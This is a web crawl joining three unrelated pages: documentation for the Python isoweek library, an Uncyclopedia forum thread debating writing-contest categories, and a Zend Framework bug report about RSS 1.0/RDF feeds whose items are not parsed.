It's called isoweek because this is the week definition of ISO 8601. This standard also define a notation for identifying weeks; YYYYWww (where the "W" is a literal). An example is "2011W08" which denotes the 8th week of year 2011. Week instances stringify to this form.
The Week instances are light weight and immutable with an interface similar to the datetime.date objects. Example code:
from isoweek import Week w = Week(2011, 20) print "Week %s starts on %s" % (w, w.monday()) print "Current week number is", Week.thisweek().week print "Next week is", Week.thisweek() + 1
Reference
Constructor:
- class isoweek.Week(year, week)
All arguments are required. Arguments should be ints.
If the week number isn't within the range of the given year, the year is adjusted to make week number within range. The final year must be within range 1 to 9999. If not ValueError is raised.
Other constructors, all class methods:
- classmethod Week.thisweek()
- Return the current week (local time).
- classmethod Week.fromordinal(ordinal)
- Return the week corresponding to the proleptic Gregorian ordinal, where January 1 of year 1 starts the week with ordinal 1.
- classmethod Week.fromstring(isostring)
- Return a week initialized from an ISO formatted string like "2011W08" or "2011-W08". Note that weeks always stringify back in the former and more compact format.
- classmethod Week.withdate(date)
- Return the week that contains the given datetime.date.
- classmethod Week.weeks_of_year(year)
- Returns an iterator over the weeks of the given year.
- classmethod Week.last_week_of_year(year)
- Returns the last week of the given year.
Instance attributes (read-only):
- Week.year
- Between 1 and 9999 inclusive.
- Week.week
- Between 1 and 53 inclusive (52 for most years).
Supported operations:
Instance methods:
- Week.replace(year, week)
- Return a Week with the same value, except for those parameters given new values by whichever keyword arguments are specified.
- Week.toordinal()
- Return the proleptic Gregorian ordinal the week, where January 1 of year 1 starts the first week.
- Week.day(num)
- Return the given day of week as a datetime.date object. Day 0 is Monday.
- Week.monday(), Week.tuesday(),.. Week.sunday()
- Return the given day of week as a datetime.date object.
- Week.isoformat()
- Return a string representing the week in ISO 8610 format, "YYYYWww". For example Week(2011, 8).isoformat() == '2011W08'.
- Week.__str__()
- For a Week w, str(w) is equivalent to w.isoformat()
- Week.__repr__()
- Return a string like "isoweek.Week(2011, 2)".
- Author: Gisle Aas
- License: BSD
- Categories
- Development Status :: 5 - Production/Stable
- Intended Audience :: Developers
- License :: OSI Approved :: BSD License
- Operating System :: OS Independent
- Programming Language :: Python
- Programming Language :: Python :: 2.6
- Programming Language :: Python :: 2.7
- Programming Language :: Python :: 3
- Topic :: Software Development :: Libraries :: Python Modules
- Package Index Owner: gisle
- DOAP record: isoweek-1.2.0.xml | http://pypi.python.org/pypi/isoweek/1.2.0 | crawl-003 | refinedweb | 513 | 60.41 |
Forum:PLS Category Discussion
From Uncyclopedia, the content-free encyclopedia
Alright, after seeing the other thread, I've decided to do 4 categories again, but I'm looking to you guys (God knows why) for input as to exactly what the 4 categories should be. We've got the old standbyes:
- Best Article
- Best Rewrite
- Best Illustrated
- Best Noob Article
And we have some new ideas
- Best Alternate Namespace Article
- Best Voice Article
- Best First Person Article
- Best Encyclopedic
- Best Article About a Historical Event (If you like the choice, provide some ideas for historical events too, so I don't have to dream them up myself)
- Best Whateveryoucanmakeup
I, personally, would like to see Best Noob replaced with another option, because I don't feel that the overall quality in that category is necessarily worth the expenditure. But what the hell do I know, that's why I'm putting up to you guys. Should Best Noob stay? Ideally, I would have went with 5 categories, but so far we're sitting at 10 judges, and at 3 a category, that would leave us 2 short, which isn't that bad. I can probably browbeat at least one or two other people into judging, and I can always do one myself if need be. I'd like some input on this because ideally I want to get the categories sorted out and the judges selected this weekend, so we can get the writing portion of the contest started shortly. And remember, don't starting writing yet, or else you'll be disqualified and we'll have to send someone after you. Someone like...Braydie. Sir ENeGMA (talk) GUN WotM PLS 03:09, 23 June 2007 (UTC)
Talk Amongst Yourselves
I say we stick with Best Article, Best Rewrite, and Best Noob Article, but with the 4th spot we now use Best Article Made in an Alternate Namespace. --
TKFUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUCK
03:11, 23 June 2007 (UTC)
- The only thing with that is, the Potatochopping crowd fought hard for Best Illustrated, and I'm sure they'll be loth to give it up. Plus, I think that the overall quality of Best Illustrated is higher, generally, then Best Noob. But I really do like the alternate namespace idea, I think it would add some creativity. Sir ENeGMA (talk) GUN WotM PLS 03:13, 23 June 2007 (UTC)
- Maybe we should shake things up a bit... Four Categories with the winner receiving $25 and then a "Best Potatoshopped Image" contest, with the winner getting $10 or $15 or whatever..., 23 June 2007 (UTC)
- Well, my original idea was to do 5 categories and split the money that way, but so far we've got judges for 4 articles, and so that seems to be what we're gonna go with. The only problem with adding something else is finding more judges. Sir ENeGMA (talk) GUN WotM PLS 20:06, 23 June 2007 (UTC)
- Not to tell you how to do your job or anything, but I know last time Brad asked people, instead of just asking for volunteers, and pretty much everyone agreed. I'm sure there are still many capable judges out there that don't even know PLS is coming, 23 June 2007 (UTC)
- That's true. Here's what I'll do: Set up 5 Categories, including Best Article, Best Rewrite, Best Noob Article, Best Illustrated article, and one my category to be announced at a later date (like tommorow). All I really need to do then is round up 3 or 4 more judges, which shouldn't be too hard, and then we can call it even. A lot of people still seem to like Best Noob Article, so I guess we'll keep that, and this way we'll get a new category in, to inject some new blood into this ma. Thus spake ENeGMA. Sir ENeGMA (talk) GUN WotM PLS 22:17, 23 June 2007 (UTC)
I like Best Encyclopedic article, because dry humor is often the best, but it's not as creative as best alternative namespace, so what do I know? Also, please stop browbeating me. I think I may have had a couple concussions already.--<<
>> 03:14, 23 June 2007 (UTC)
- Your prescience is astounding :) The thing is though, you get a lot of plain 'ole Encyclopedic articles for the other categories, generally. Best Rewrite and Best Article have plenty of doctinaire Uncyc articles. Heck, I even made one last time for Best Rewrite: Civil War (*cough*shamelessplug*cough*). I like the style, but I'm not sure it needs its own section, which really could be better used. Also, come onto IRC if you can atm. Sir ENeGMA (talk) GUN WotM PLS 03:17, 23 June 2007 (UTC)
- Why are we narrowing things down so much? Can't the current four categories be of any namespace, be about historical events, be in first-person, or be encyclopedic? Why are we suggesting such specific categories? That's absolutely absurd. I like the Best Voice Article, but every other suggestion is just ridiculous. --Hotadmin4u69 [TALK] 06:54, 23 June 2007 (UTC)
- Yes, they can, but the point about picking a limited category is to test someone's creativity in a specific way. It could be said that 'Best Article' is overly broad, and that it really isn't fair to compare articles so different from one another. Limiting one category I think would give writer's an oppurtunity to compete against each other on a much fairer plane. Best article about the Punic Wars, for example, would be a very specific, amusing test for writers. Or at least it would be for me. Sir ENeGMA (talk) GUN WotM PLS 13:55, 23 June 2007 (UTC)
- Right, but it's like the VFH. Articles of any namespace and topic can be featured. The "Best Article" category is meant to be broad. In the last PLS, there were actually quite a few historically themed articles, and two HowTos submitted (one of them being mine). Being specific about namespaces and topics is stupid, period. The only exception would be if we had a "Best UnNews" category, which I am for. --Hotadmin4u69 [TALK] 18:39, 23 June 2007 (UTC)
I like some of them, but not better than best n00b article. Maybe the quality is lower, but it's a great encouragement to n00bs (which we don't do enough of sometimes!) and probably the only thing they can win - I'm not sure I'd have bothered entering last time if I hadn't been (just) eligible for n00bdom. --Whhhy?Whut?How? *Back from the dead* 09:50, 23 June 2007 (UTC)
- Well, the thing is, the articles that usually Best Noob are always very good. When I judged it, Shandon and Procopius were in 'Best Noob'. And they cleaned house, because they're good writers. Shandon won best noob and Procopius actually won Best Article. So in their case, it didn't really make much sense for them to compete with the rest of the noobs; it was men against boys, as it were. And to be brutally, aside from their articles, it was low quality. So what we end up doing is either: a; rewarding someone who's good enough to compete in other categories, which is unfair or b; rewarding someone who just isn't that good. But that's just my take. If you guys really want Best Noob to stay, It'll stay, I just think there's a lot of potential here. Sir ENeGMA (talk) GUN WotM PLS 13:55, 23 June 2007 (UTC)
- Hmm... very good point. Then again, giving the n00bs some false hope is still vaguely encouraging I suppose. :-) --Whhhy?Whut?How? *Back from the dead* 17:22, 23 June 2007 (UTC)
If I chose the categories, they would be: Best Article, Best Rewrite, Best Illustrated, Best Noob Article, Best Voice Article, Best Expansion, Best Article About a Historical Event, & Best Biography. -- 22:08, 23 June 2007 (UTC)
- I personally wouldn't judge or enter the PLS if that were the case. --Hotadmin4u69 [TALK] 22:22, 23 June 2007 (UTC)
- In fact, your very presence on this earth has caused me to second guess all that I once believed:20, 24 June 2007 (UTC)
I say we'll probably need to vote on categories soon. Perhaps we should say Best Article and Best Rewrite are automatically in, and then we pick the top two or three from the votes.:08, 24 June 2007 (UTC)
- It has already been decided. See the PLS. --Hotadmin4u69 [TALK] 03:23, 24 June 2007 (UTC)
- Damn. Why the hell do I always miss out on finding exactly when the PLS starts?:31, 24 June 2007 (UTC)
- Have no fear, your vote is here: Forum:Official PLS Category Vote - Vote Now or Forever Hold Your Peace I wasn't actually going to do a vote, but your post made me realize people expect one, so there you guys go. Say it loud, you're enfranchised and proud. Sir ENeGMA (talk) GUN WotM PLS 03:33, 24 June 2007 (UTC) | http://uncyclopedia.wikia.com/wiki/Forum:PLS_Category_Discussion?t=20130516044915 | CC-MAIN-2015-48 | refinedweb | 1,524 | 67.99 |
Synopsis_16 - IPC / IO / Signals [DRAFT]
Author: Largely, the authors of the related Perl 5 docs. Maintainer: Larry Wall <[email protected]> Contributions: Mark Stosberg <[email protected]> Date: 12 Sep 2006 Last Modified: 1 May 2007 Version: 17
This is a draft document. Many of these functions will work as in Perl 5, except we're trying to rationalize everything into packages. For now you can assume most of the important functions will automatically be in the * namespace. However, with IO operations in particular, many of them are really methods on an IO handle, and if there is a corresponding global function, it's merely an exported version of the method.
As a starting point, you can help by finding the official Perl 5 documentation for these functions and copying it here.
$file ~~ :f && $file ~~ :T .
You can test multiple features using junctions:
if -$filename ~~ :r & :w & :x {...}
Or pass multiple tests together in OO style:
if $filename.TEST(:e,:x) {...}
our Int multi chown ($uid = -1, $gid = -1, *@files).
$cnt = chmod 0o755, 'foo', 'bar'; chmod 0o755, @executables; $mode = '0644'; chmod $mode, 'foo'; # !!! sets mode to --w----r-T $mode = '0o644'; chmod $mode, 'foo'; # this is better $mode = 0o644; chmod $mode, 'foo'; # this is best
Closes the file or pipe associated with the file handle, returning true only if IO buffers are successfully flushed and closes the system file descriptor. Closes the currently selected filehandle if the argument is omitted.
You don't have to close IO
$!.
my $fh = connect($hostname, 80);
Attempts to connect to a remote host and returns an IO handle if successful. The call fails with an exception if it cannot connect.
Available only as a handle method.
Available only as a handle method.
Available only as a handle method.
Returns a stat buffer. If the lstat succeeds, the stat buffer evaluates to true, and additional file tests may be performed on the value. If the stat fails, all subsequent tests on the stat buffer also evaluate to false.
The
.name method returns the name of the file/socket/uri the handle was opened with, if known. Returns undef otherwise. There is no corresponding
name() function.
# Read my $fh = open($filename); # Write my $fh = open($filename, :w);
our IO method fdopen(Int $fd)
Associate an IO object with an already-open file descriptor, presumably passed in from the parent process.
my $dir = IO::Dir::open('.');
Opens a directory named EXPR for processing. Makes the directory looks like a list of autochomped lines, so just use ordinary IO operators after the open.
Deletes the directory specified by FILENAME if that directory is empty. If it succeeds it returns true, otherwise it returns false and sets
$! (errno). If FILENAME is omitted, uses
$_.
Returns a stat buffer. If the lstat succeeds, the stat buffer evaluates to true, and additional file tests may be performed on the value. If the stat fails, all subsequent tests on the stat buffer also evaluate to false.
Deletes a list of files. Returns the number of files successfully deleted.
$cnt = unlink 'a', 'b', 'c';
Be warned that unlinking a directory can inflict damage on your filesystem. Finally, using
unlink on directories is not supported on many operating systems. Use
rmdir instead.
It is an error to use bare
unlink without arguments.
our Bool method getc (IO $self: *@LIST)
Returns the next character from the input stream attached to IO, or the undefined value at end of file, or if there was an error (in the latter case
$! is set).
our Bool method print (IO $self: *@LIST) our Bool multi print (*@LIST) our Bool method print (Str $self: IO $io)
Prints a string or a list of strings. Returns Bool::True if successful, Failure otherwise. The IO handle, if supplied, must be an object that supports I/O. Indirect objects in Perl 6 must always be followed by a colon, and any indirect object more complicated than a variable should be put into parentheses.
If IO is omitted, prints to
$*DEFOUT, which is aliased to
$*OUT when the program starts but may be temporarily or permanently rebound to some other file handle. The form with leading dot prints
$_ to
$*DEFOUT unless an explicit filehandle is supplied.
It is a compiler error to use a bare
There is are no variables corresponding to Perl 5's
$, and
$\ variables. Use
join to interpose separators; use filehandle properties to change line endings.
our Bool method say (IO $self: *@LIST) our Bool multi say (*@LIST) our Bool method say (Str $self: IO $io)
This is identical to print() except that it auto-appends a newline after the final argument.
Was: print "Hello, world!\n"; Now: say "Hello, world!";
As with
say without arguments.
our Bool method printf (IO $self: Str $fmt, *@LIST) our Bool multi printf (Str $fmt, *@LIST)
The function form works as in Perl 5 and always prints to $*DEFOUT. The method form uses IO handles as objects, not formats.
our List multi method lines (IO $handle:) is export; our List multi lines (Str $filename);
Returns all the lines of a file as a (lazy) List regardless of context. See also
slurp.
Gone, see Pipe.pair
our Str prompt (Str $prompt)
Gone. (Note: for subsecond sleep, just use sleep with a fractional argument.)
our Item multi method slurp (IO $handle: *%opts) is export; our Item multi slurp (Str $filename, *%opts);
Slurps the entire file into a Str or Buf regardless of context. (See also
lines.) Whether a Str or Buf is returned depends on the options.
Gone, see Socket.pair
Prints a warning just like Perl 5, except that it is always sent to the object in $*DEFERR, which is just standard error ($*ERR).
our IO method to(Str $command, *%opts)
Opens a one-way pipe writing to $command. IO redirection for stderr is specified with :err(IO) or :err<Str>. Other IO redirection is done with feed operators. XXX how to specify "2>&1"?
our IO method from(Str $command, *%opts)
Opens a one-way pipe reading from $command. IO redirection for stderr is specified with :err(IO) or :err<Str>. Other IO redirection is done with feed operators. XXX how to specify "2>&1"?
our List of IO method pair()
A wrapper for pipe(2), returns a pair of IO objects representing the reader and writer ends of the pipe.
($r, $w) = Pipe.pair;
our List of IO method pair(Int $domain, Int $type, Int $protocol)
A wrapper for socketpair(2), returns a pair of IO objects representing the reader and writer ends of the socket.
use Socket; ($r, $w) = Socket.pair(AF_UNIX, SOCK_STREAM, PF_UNSPEC);
Please post errors and feedback to perl6-language. If you are making a general laundry list, please separate messages by topic. | http://search.cpan.org/~lichtkind/Perl6-Doc/lib/Perl6/Doc/Design/S16.pod | CC-MAIN-2017-39 | refinedweb | 1,123 | 66.64 |
well im learning python and im trying to make this kind of text game and im stuck on while loop...what im trying to do is have list of things that can be used, and compare user's raw_input to this list, if they chose right one within 5 attempts continue, otherwise die with message. here is my code:
def die(why): print why exit(0) #this is the list user's input is compared to tools = ["paper", "gas", "lighter", "glass", "fuel"] #empty list that users input is appended to yrs = [] choice = None print "You need to make fire" while choice not in tools: print "Enter what you would use:" choice = raw_input("> ") yrs.append(choice) while yrs < 5: print yrs die("you tried too many times") if choice in tools: print "Well done, %s was what you needeed" % choice break
but choice is not being added to list
yrs, it works with just one while loop but then it gonna go forever or until one of items in tools list is entered as users input, however id like to limit it to 5 tries and then enter with :
die("You tried too many times") but it gives me die-message straight after the first attempt... I was searching this forum, didnt find satisfying answer, please help me | http://www.howtobuildsoftware.com/index.php/how-do/br44/python-while-loop-nested-loops-python-nested-loop-with-break | CC-MAIN-2019-30 | refinedweb | 217 | 63.29 |
Maintain a window of len(p) in s, and slide to right until finish. Time complexity is O(len(s)).
from collections import Counter def findAnagrams(self, s, p): """ :type s: str :type p: str :rtype: List[int] """ res = [] pCounter = Counter(p) sCounter = Counter(s[:len(p)-1]) for i in range(len(p)-1,len(s)): sCounter[s[i]] += 1 # include a new char in the window if sCounter == pCounter: # This step is O(1), since there are at most 26 English letters res.append(i-len(p)+1) # append the starting index sCounter[s[i-len(p)+1]] -= 1 # decrease the count of oldest char in the window if sCounter[s[i-len(p)+1]] == 0: del sCounter[s[i-len(p)+1]] # remove the count if it is 0 return res
@weijuemin Nope... because OJ already imports everything. On local machine, you should put
from collections import Counter in the beginning.
@WKVictor Hmmm odd. I had to import Counter on OJ otherwise I'm getting this NameError. Not sure what's going on behind the scene. Well, just a friendly reminder in case you forgot but seems you didn't have the same issue I got so never mind :-)
@Zura Because the window will be slided to right by one position in next iteration, the oldest char will no longer be in the window.
@weijuemin adding from collections import Counter would resolve the issue.
@WKVictor I thought it was an redundant operation(because you can just delete it ) but then I realized that there could be multiple same character in the Counter. Thanks for your explanation.
What is the time complexity of "sCounter == pCounter"? Could it be O(len(p)) in worst case?
def findAnagrams(self, s, p): """ :type s: str :type p: str :rtype: List[int] """ d = defaultdict(int) ns, np = len(s), len(p) ans = [] for c in p: d[c] -= 1 for i in xrange(ns): if i < np: d[s[i]] += 1 if not d[s[i]]: del d[s[i]] else: if not d: ans.append(i-np) d[s[i-np]] -= 1 if not d[s[i-np]] : del d[s[i-np]] d[s[i]] += 1 if not d[s[i]]: del d[s[i]] if not d: ans.append(i-np+1) return ans
Time complexity can be reduced down to O(len(s)) if you use a dictionary instead of a Counter. Same idea, just keep a sliding window and delete the keys when they reach zero. But, there's no need for Counter comparison (which is O(len(p)), since you can just check if the dictionary is empty.
@tototo In fact, since there are at most 26 English letters, pCounter can have at most 26 keys, which implies the comparison "sCounter == pCounter" is actually O(1). So I change the time complexity back to O(len(s)).
Did it using a while loop, thought it was more intuitive.
def findAnagrams(self, s, p): """ :type s: str :type p: str :rtype: List[int] """ a=[] l=len(p) cp=Counter(p) cs=Counter(s[:l-1]) i=0 while i+l<=len(s): cs[s[i+l-1]]+=1 if cs==cp: a.append(i) cs[s[i]]-=1 if cs[s[i]]==0: del cs[s[i]] i+=1 return a
I have a question for the dictionary. Based on sub list, you create a sCounter. In for loops, sCounter[s[i]] += 1. What if s[i] is not a key in the sCounter? It will raise an error.
Looks like your connection to LeetCode Discuss was lost, please wait while we try to reconnect. | https://discuss.leetcode.com/topic/64412/python-sliding-window-solution-using-counter | CC-MAIN-2017-47 | refinedweb | 608 | 71.95 |
STRTOL(3) BSD Programmer's Manual STRTOL(3)
strtol, strtoll, strtoq - convert string value to a long or long long in- teger
#include <stdlib.h> #include <limits.h> long strtol(const char *nptr, char **endptr, int base); #include <stdlib.h> #include <limits.h> long long strtoll(const char *nptr, char **endptr, int base); #include <inttypes.h> intmax_t strtoimax(const char *nptr, char **endptr, int base); #include <sys/types.h> #include <stdlib.h> #include <limits.h> quad_t strtoq(const char *nptr, char **endptr, int base);
The strtol() function converts the string in nptr to a long value. The strtoll() function converts the string in nptr to a long long value. The strtoq() function is a deprecated equivalent of strtoll() and is provided for backwards compatibility with legacy programs. The conversion is done according to the given base, which must be a number between 2 and 36 in- clusive or the special value 0. value in the obvious manner, stopping at the first character which is not a valid digit in the given base. (In bases above 10, the letter 'A' in either upper or lower case represents 10, 'B' represents 11, and so forth, with 'Z' represent- ing 35.) If endptr is non.)
The strtol() function returns the result of the conversion, unless the value would underflow or overflow. If an underflow occurs, strtol() re- turns LONG_MIN. If an overflow occurs, strtol() returns LONG_MAX. In both cases, errno is set to ERANGE. The strtoll() function has identical return values except that LLONG_MIN and LLONG_MAX are used to indicate underflow and overflow respectively.
Ensuring that a string is a valid number (i.e., in range and containing no trailing characters) requires clearing errno beforehand explicitly since errno is not changed on a successful call to strtol(), and the re- turn value of strtol() cannot be used unambiguously to signal an error: char *ep; long lval; ... errno = 0; lval = strtol(buf, &ep, 10); if (buf[0] == '\0' || *ep != '\0') goto not_a_number; if (errno == ERANGE && (lval == LONG_MAX || lval == LONG_MIN)) goto out_of_range; This example will accept "12" but not "12foo" or "12\n". If trailing whi- tespace is acceptable, further checks must be done on *ep; altern (buf[0] == '\0' || *ep != '\0') goto not_a_number; if ((errno == ERANGE && (lval == LONG_MAX || lval == LONG_MIN)) || (lval > INT_MAX || lval < INT_MIN)) goto out_of_range; ival = lval;
[ERANGE] The given string was out of range; the value converted has been clamped.
atof(3), atoi(3), atol(3), atoll(3), sscanf(3), strtod(3), strtoul(3)
The strtol(), strtoll() and strtoimax() functions conform to ISO/IEC 9899:1999 ("ISO C99"). The strtoq() function is a BSD extension and is provided for backwards compatibility with legacy programs.
Ignores the current locale. MirOS BSD #10-current March 19,. | http://www.mirbsd.org/htman/i386/man3/strtoimax.htm | CC-MAIN-2015-06 | refinedweb | 452 | 65.73 |
How many of you...
import 3D models into Hitfilm? Should I pay the $30 for the add on that lets me do that? I just started using Blender and have been using Hitfilm for a long time.
I haven't yet.
It's not the type of thing I do.
That being said ... it IS 40% off so now WOULD be z good time to get it if you plan on doing stuff with 3d models.
It REALLY depends what you want to do in the future.
I'll be a bit of z traitor to HitFilm here and remind you that you CAN do video compositing inside Blender if push comes to shove.
Sure, it's nice to be able to do this in one editor but if you just need a one off VFX with 3d models ...
I've been importing 3d models for about a year now, it's awesome but I'm still learning new things like how to correctly light models and track them in scenes.
@Meridian2351 I have used Pro since about Jan 201, but only imported model a few times trying to do something learning wise until recently. The big obstacle for me was tracking. I only recently was able to track successfully in Hitfilm and lock the model to a point so now I will do more of it. With Express now, you can import the models but they comp will be watermarked and iron out those stumbling blocks before you commit to the add on pack, but really, only you can determine how much you will likely be using it and that will truly be the only metric of it's worth to you, in my opinion.
Been using quite a few. I'm running Pro. The quality of the MODEL matters a lot as to success. I often process them thru Poser, Mixamo, and Blender for things like animations.
best,....... john | https://community.fxhome.com/discussion/54922/how-many-of-you | CC-MAIN-2022-33 | refinedweb | 321 | 81.02 |
26 USC § 6—
(B) any part of any installment under section 6166 (including any part of a deficiency prorated to any installment under such section).
(2) Security
Source(Aug. 16, 1954, ch. 736, 68A Stat. 762; Pub. L. 85–866, title II, § 206(c),Sept. 2, 1958, 72 Stat. 1684; Pub. L. 91–172, title I, § 101(j)(37),Dec. 30, 1969, 83 Stat. 530; Pub. L. 91–614, title I, § 101(h),Dec. 31, 1970, 84 Stat. 1838; Pub. L. 93–406, title II, § 1016(a)(7),Sept. 2, 1974, 88 Stat. 929; Pub. L. 94–455, title XIII, § 1307(d)(2)(C), title XVI, § 1605(b)(3), title XIX, § 1906(b)(13)(A), title XX, § 2004(c)(1), (2),Oct. 4, 1976, 90 Stat. 1727, 1754, 1834, 1867, 1868; Pub. L. 96–223, title I, § 101(f)(1)(H),Apr. 2, 1980, 94 Stat. 252; Pub. L. 96–589, § 6(i)(8),Dec. 24, 1980, 94 Stat. 3410; Pub. L. 97–34, title IV, § 422(e)(1),Aug. 13, 1981, 95 Stat. 316; Pub. L. 100–418, title I, § 1941(b)(2)(B)(viii),Aug. 23, 1988, 102 Stat. 1323; Pub. L. 107–134, title I, § 112(d)(3),Jan. 23, 2002, 115 Stat. 2435.)
Amendments
2002—Subsec. (d)(3). Pub. L. 107–134added par. (3).
1988—Subsec. (b)(1). Pub. L. 100–418substituted “or 44” for “44, or 45” in two places.
1981—Subsec. (a)(2)(B). Pub. L. 97–34struck out reference to section 6166A.
1980—Subsec. (b)(1). Pub. L. 96–223inserted references to chapter 45.
Subsec. (c). Pub. L. 96–589substituted “Claims in cases under title 11 of the United States Code or in receivership proceedings” for “Claims in bankruptcy or receivership proceedings” in heading, and substituted reference to cases under title 11 of the United States Code, for reference to bankruptcy proceedings in text.
1976—Subsec. (a)(1). Pub. L. 94–455, § 1906(b)(13)(A), struck out “or his delegate” after “Secretary”.
Subsec. (a)(2). Pub. L. 94–455, § 2004(c)(1), struck out in subpar. (A) “that the payment, on the due date, of” before “any part of the amount”, in subpar. (B) provisions relating to payment, on the date fixed for payment of any installment, and subpar. (C) which related to payment upon notice and demand of a deficiency prorated under the provisions of section 6161, inserted in subpar. (B) “or 6166A” after “section 6166”, substituted in subpar. (B) “under such section” for “the date for payment for which had not arrived”, and inserted in text following subpar. (B) provisions relating to extension of time for payment in the case of an amount referred to in subpar. (B).
Subsec. (b). Pub. L. 94–455, §§ 1307(d)(2)(C), 1605(b)(3), 2004(c)(2), among other changes, inserted reference to chapter 41, effective on or after Oct. 4, 1976, and reference to chapter 44, applicable to taxable years of real estate investment trusts beginning after Oct. 4, 1976, and struck out provisions relating to grant of extensions with respect to hardships to taxpayers, applicable to the estates of decedents dying after Dec. 31, 1976.
Subsec. (d)(2). Pub. L. 94–455, § 1906(b)(13)(A), struck out “or his delegate” after “Secretary”.
1974—Subsec. (b). Pub. L. 93–406inserted references to chapter 43.
1970—Subsec. (a)(1). Pub. L. 91–614substituted “6 months (12 months in the case of estate tax)” for “6 months”.
1969—Subsec. (b). Pub. L. 91–172inserted references to chapter 42.
1958—Subsec. (a)(2). Pub. L. 85–866inserted provisions allowing Secretary or his delegate to extend time for payment for reasonable period, not exceeding 10 years from date prescribed by section 6151 (a), if he finds that payment on date fixed for payment of any installment under section 6166, or any part of such installment, or payment of any part of a deficiency prorated under section 6166 to installments the date for payment of which had arrived would result in undue hardship. 1980 Amendments
Amendment by Pub. L. 96–589effective Oct. 1, 1979, but not applicable to proceedings under Title 11, Bankruptcy, commenced before Oct. 1, 1979, see section 7(e) ofPub. L. 96–589, set out as a note under section 108 of this title.
Section 101(i) ofPub. L. 96–223, as amended by Pub. L. 99–514, § 2,Oct. 22, 1986, 100 Stat. 2095, provided that:
“(1) In general.—The amendments made by this section [enacting sections 4986 to 4998, 6050C, 6076, and 7241 of this title and amending this section and sections 164, 6211, 6212, 6213, 6214, 6302, 6344, 6501, 6511, 6512, 6601, 6611, 6652, 6653, 6862, 7422, and 7512 of this title] shall apply to periods after February 29, 1980.
“(2) Transitional rules.—For the period ending June 30, 1980, the Secretary of the Treasury or his delegate shall prescribe rules relating to the administration of chapter 45 of the Internal Revenue Code of 1986 [formerly I.R.C. 1954]. To the extent provided in such rules, such rules shall supplement or supplant for such period the administrative provisions contained in chapter 45 of such Code (or in so much of subtitle F of such Code [section 6001 et seq. of this title] as relates to such chapter 45).”
Effective Date of 1976 Amendment
Amendment by section 1307(d)(2)(C) ofPub. L. 94–455effective on and after Oct. 4, 1976, see section 1307(e)(6) ofPub. L. 94–455, set out as a note under section 501 of this title.
For effective date of amendment by section 1605(b)(3) ofPub. L. 94–455, see section 1608(d) ofPub. L. 94–455, set out as a note under section 856 of this title.
Amendment by section 2004(c)(1), (2) ofPub. L. 94–455applicable to estates of decedents dying after Dec. 31, 1976, see section 2004(g) ofPub. L. 94–455, set out as an Effective Date note under section 6166 1969 Amendment
Amendment by Pub. L. 91–172effective Jan. 1, 1970, see section 101(k)(1) ofPub. L. 91–172, set out as an Effective Date note under section 4940 of this title.
Effective Date of 1958 Amendment
Section 206(f) ofPub. L. 85–866, as amended by Pub. L. 99–514, § 2,Oct. 22, 1986, 100 Stat. 2095, provided that: “The amendments made by this section [enacting section 6166 of this title and amending this section and sections 6503 and 6601 of this title] shall apply to estates of decedents with respect to which the date for the filing of the estate tax return (including extensions thereof) prescribed by section 6075(a) of the Internal Revenue Code of 1986 [formerly I.R.C. 1954] is after the date of the enactment of this Act [Sept. 2, 1958]; except that (1) section 6166(i) of such Code as added by this section shall apply to estates of decedents dying after August 16, 1954, but only if the date for the filing of the estate tax return (including extensions thereof) expired on or before the date of the enactment of this Act [Sept. 2, 1958], and (2) notwithstanding section 6166(a) of such Code, if an election under such section is required to be made before the sixtieth day after the date of the enactment of this Act [Sept. 2, 1958] such an election shall be considered timely if made on or before such sixtieth. | http://www.law.cornell.edu/uscode/text/26/6161 | CC-MAIN-2013-48 | refinedweb | 1,236 | 65.62 |
Issues
ZF-405: Empty items array when parsing rss1.0/RDF feed
Description
When trying to parse an RSS1.0 / RDF feed (rdf namespace), items array is empty.
Example : (-;
Produce : [title] => PHP: Hypertext Preprocessor [link] => [description] => The PHP scripting language web site [items] => Array ( )
the XML dump of zend_feed is :
<?xml version="1.0" encoding="utf-8"?>" rdf: PHP: Hypertext Preprocessor The PHP scripting language web site"/> .../...
<rdf:li rdf:"/</a>> </rdf:Seq> </items>
I did a quick review of Zend_Feed, finding that there is a namespace registration which seems to be in trouble, but not sure, and it need probaly to switch the item tag of entryRSS class, or add a new entryRDF class.
It's not a matter, but as this the feed, it's humoristic (-;
Thanks for all you job.
Thierry
Posted by Daniel Bezruchkin (visualimpakt) on 2006-10-13T18:43:13.000+0000
Extracting this into your zend directory will get RDF feeds to work.
Posted by Dave Liefbroer (dliefbroer) on 2006-10-30T01:16:16.000+0000
The attached zip doesn't work. It makes a major error (blank page). Will investigate on the error.
Posted by Dave Liefbroer (dliefbroer) on 2006-10-30T01:52:01.000+0000
It's because of: $success = @$doc->loadXML(Zend_Feed::utf8ToUnicodeEntities($string)); in Feed.php
The utf8ToUnicodeEntities function doesn't exist (wrong code version?)
In the previous version it was: $success = @$doc->loadXML($string); That works!
Posted by Bill Karwin (bkarwin) on 2006-11-13T15:26:52.000+0000
Changing fix version to 0.6.0.
Posted by Ronnie Schwartz (rustybrick) on 2006-11-17T11:40:51.000+0000
I have the exact same issue. Any idea when this will be resolved? I've used PEAR's RSS class, no good. I've used Magpie/simplepie, no good. This one was able to parse all of the new feeds but cannot parse the 1.0 rdf feeds. So it's the best so far!
Posted by Simone Carletti (weppos) on 2007-12-01T12:41:20.000+0000
This bug depends on ZF-26. RSS 1.0 lists items outside channel node and Zend_Feed actually can't handle this situation.
Rather than fixing the behavior, I would suggest to add a new RDF class, as proposed in the description of this issue. RSS 1.0 is completely an other branch compared with RSS 2.0.
The main difference between RSS 0.91 branch (created by Dave Winer) and RSS 1.0 branch (managed by RSS-DEV Working Group) is that the latter is RDF based while RDF architecture has been completely removed in RSS 0.91, RSS 0.92, RSS 2.0.
Additionally, I would suggest to add a new class property to return feed type/version. The following seems to be a list of formats currently supported by Zend feed: * Atom 0.3 * Atom 0.5 * Atom 1.0 * RSS 0.91 * RSS 0.92 * RSS 2.0 The following formats should be supported but they are not, right now: * RSS 1.0 Perhaps a new ticket is the better solution for a new proposal, rather than a comment.
Posted by Simone Carletti (weppos) on 2007-12-01T12:42:19.000+0000
I forgot to say that my previous comment has been inspired by…
Posted by Matthew Turland (elazar) on 2008-02-03T08:24:38.000+0000
The only difference between RSS 1.0 and other versions that is related to this issue is that item elements are not contained within the channel element. The attached file patch.diff modifies Zend_Feed_Rss to check for this and also patches the appropriate test in the test suite so that, without the patch to Zend_Feed_Rss, RSS 1.0 feed tests will fail.
Posted by Simone Carletti (weppos) on 2008-02-07T15:19:01.000+0000
